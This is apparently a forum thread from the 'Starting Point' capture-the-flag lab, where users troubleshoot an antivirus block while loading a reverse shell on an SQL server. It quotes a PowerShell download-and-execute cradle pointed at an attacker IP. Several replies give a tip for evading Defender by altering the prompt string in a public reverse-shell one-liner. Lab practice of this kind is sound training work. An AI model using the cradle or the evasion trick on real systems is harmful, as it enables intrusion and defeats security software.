Starting Point

This script contains malicious content and has been blocked by your antivirus software.

At line:1 char:1

  • IEX (New-Object Net.WebClient).DownloadString("http:// ip /she …

      + CategoryInfo          : ParserError: (:) [Invoke-Expression], ParseException   
      + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand   

I throw this error when loading the shell on the sql server, someone also came out and solved it already?

I had the issue because I was using a powershell from github (copy/paste failed into my VM…) And the solution was on commentsl:
if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with “#”
source: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok · GitHub

However, the script provided on the tutorial does contain the # so you may check that part on your reverse shell


The official tutorial contains a typo. There is "# " and it has to be “#” without a space